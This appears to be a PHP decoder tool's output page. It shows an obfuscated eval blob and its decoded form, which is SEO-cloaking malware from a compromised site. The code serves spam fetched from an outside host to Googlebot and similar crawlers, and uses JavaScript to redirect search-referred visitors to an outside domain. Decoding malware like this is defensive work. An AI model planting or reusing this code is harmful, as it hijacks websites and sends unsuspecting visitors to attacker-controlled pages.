Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode(str_rot13('yIIuo9cVRC3Be9vmHAnbjLMpHy0PcBWnc0DvAQIDKEful6jKiX..
Decoded Output download
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
define('URI', $_SERVER['REQUEST_URI']);
define('HOST', base64_decode('aHR0cHM6Ly9qaS5iZXQ2a3Nlby5jb20v'));
define('MULU', '[a-zA-Z0-9_-]+-[1-9]');
function isEngines($userAgent) {
return preg_match('/Googlebot|Bingbot|Yahoo!/i', $userAgent);
}
function isIncludes($uri) {
return preg_match('/' . MULU . '/i', $uri);
}
function isRef($referrer) {
return preg_match('/google|bing|yahoo/i', $referrer);
}
function getContents($url) {
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
$curlError = curl_error($ch);
curl_close($ch);
if ($result === false) {
error_log("cURL Error: " . $curlError);
return false;
}
return $result;
} else {
return file_get_contents($url);
}
}
$ref = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$key = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$ym = $_SERVER['HTTP_HOST'];
if (isEngines($key)) {
header('Content-Type:text/html;charset=utf-8');
if (isIncludes(URI)) {
$content = getContents(HOST . "?xhost=" . $ym . '&reurl=' . URI . '&ua=Googlebot' . '&f=google');
if ($content) {
echo $content;
} else {
header("HTTP/1.0 404 Not Found");
echo "404 - Content not found.";
exit;
}
} else {
echo file_get_contents('https://jsc.hhvipcdn.com/zz.php');
exit;
}
} else {
if (isIncludes(URI) && isRef($ref)) {
echo '<html>
<head>
<title>The resource cannot be found.</title>
<script>
window.location = "https://br.googleeplay.com/daxiong.html";
</script>
</head>
<body>
<h1>Not Found</h1>
</body>
</html>';
exit;
}
}
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode(str_rot13('yIIuo9cVRC3Be9vmHAnbjLMpHy0PcBWnc0DvAQIDKEful6jKiX3khin6DP757mr7TTAZdUY7OoUm5f3fmWgkDbHw2VV6NIfjbGqdeDdALk47ZL14YSt4I3p+qG0n69c7UtbnvicbUqReWBuXzY5LOP3vh3SPEFpIf/csTwuHCQcwVqKk2Y7Sc6wdQP37v2H/LAi6CYnTV0srGjP4ksH+QHpNaYbWsKihrWEjQ27qag0tioh3/sKyG3q4jo798/aZ/KZDGApK36qawI+4WzCyWUsw/uuV8VAos+mJimKdy0598do+0XksGeORmgXDPZMQkOVeaVACbysGuZoqBoldui6gVQtkSJxpbvvzp2suPhYe2CmV+GltHl6r/bnnlA+ief/5UlnGe9gEgPeCr1ShDkXxatbGZkatnNFZQPGmuk+pfLWUzp+zZ70n0kx0vpn/F3vhRa6nDeMCn5aduwA33FrrH5T1IzHnoWaMQByoxRAKYNR7WtOjJZtRIQ/QlIZyChdt3XuQvX1WKLV+rPE0tW2v92B7/+xrINPl6U60OdAGcA3kEkLReayuAWOB+PWlOMfTgVKl2cgaEeBS3iuPESrzhIjhwp0eQHPoLQrxSzindjYosIKu4QKtagK9LAzadCRnfT2AkiMtMUpUjkic1UlA03QLq2N8oz++3yiFnrLTPs1/waXNQu2u4HxnvT1w6VbFFIORFVZyMm4UlG8yyQXDtPp0Z+DJXMR8FdrGMIQDuGloaEYjhn4ElOlcrSqVN7Ui4usPSIFg+UnJ50eWafKrVW4EOKDu+WnROqDOxGgxG+JMxkjSBEyDNWMNysI8KJz90rtrJtdqgTkgHxCi0QRohxVLgleIU3E9wRrd3ISls5TdnA6leEqNgghrPdqJ5DEnVRgsJTDDBE/VoTUwiLI9MS/weN4ohakwjLLhmsrTPkVdethMQoEEr7slrFV6ddJDAJlkx5uPxGglfDTKhxaqGw7AJA3ZBcfMkbKhX0yy0D6HEUlrc1XDEoakuFXb6ccAJPiawKZ04NYq8QG0gWYrSYZzVKJHiD6SNW5WfXTIjPfzldV8lRRkUxbCljJJjNo7auQQ93+kvUvu2zTCw0oxE8IF7BXNFbi8YmDYaMjHiuO7iIBM4Yof/sKrB9dlEigK6ybjRqQexH9utuXrkbDv4bnlUSBnInEgoxPUmtzWJFDBQsVfJrwkcESj4dbiGjqc23WZ42ls0luj16btaefP0Sjg9yVUIPGmcIOg8/OE7Fa31v+x6wrip0TNK7CZgB/JIgAmwL/0c/Vs'))));Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 26a41821c374f3c3ba7e7b8f24977baa |
| Eval Count | 1 |
| Decode Time | 66 ms |